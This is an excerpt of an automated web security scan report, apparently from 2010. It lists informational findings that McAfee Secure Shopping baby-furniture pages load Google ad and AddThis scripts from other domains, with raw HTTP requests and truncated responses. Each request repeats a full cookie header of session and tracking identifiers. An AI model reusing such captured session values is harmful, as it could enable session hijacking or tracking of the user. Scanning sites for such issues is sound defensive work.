<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Dressers at McAfee Secure Shopping - Search, Discover & Comp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.66. http://secureshopping.mcafee.com/browse/baby/furniture/gliders-walkers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/gliders-walkers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/gliders-walkers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:32 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:32 GMT
Content-Length: 55253

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Gliders & Walkers at McAfee Secure Shopping - Search, Discov
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.67. http://secureshopping.mcafee.com/browse/baby/furniture/high-chairs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/high-chairs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/high-chairs/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:32 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:32 GMT
Content-Length: 69234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View High Chairs at McAfee Secure Shopping - Search, Discover & C
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.68. http://secureshopping.mcafee.com/browse/baby/furniture/lamps-shades/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/lamps-shades/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/lamps-shades/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:33 GMT
Content-Length: 63345

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Lamps & Shades at McAfee Secure Shopping - Search, Discover
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.69. http://secureshopping.mcafee.com/browse/baby/furniture/mobiles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/mobiles/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/mobiles/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:36 GMT
Content-Length: 57498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Mobiles at McAfee Secure Shopping - Search, Discover & Compa
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.70. http://secureshopping.mcafee.com/browse/baby/furniture/moses-baskets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/moses-baskets/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/moses-baskets/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:36 GMT
Content-Length: 50994

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Moses Baskets at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.71. http://secureshopping.mcafee.com/browse/baby/furniture/night-lights/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/night-lights/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/night-lights/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:37 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:37 GMT
Content-Length: 55444

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Night Lights at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.72. http://secureshopping.mcafee.com/browse/baby/furniture/play-pens/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/play-pens/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/play-pens/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:38 GMT
Content-Length: 63045

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Play Pens at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.73. http://secureshopping.mcafee.com/browse/baby/furniture/rocking-chairs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/rocking-chairs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/rocking-chairs/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:38 GMT
Content-Length: 65319

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Rocking Chairs at McAfee Secure Shopping - Search, Discover &amp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.74. http://secureshopping.mcafee.com/browse/baby/furniture/swings-bouncers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/swings-bouncers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/swings-bouncers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:39 GMT
Content-Length: 60698

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Swings & Bouncers at McAfee Secure Shopping - Search, Discov
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.75. http://secureshopping.mcafee.com/browse/baby/furniture/toddler-bed/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/toddler-bed/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/toddler-bed/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
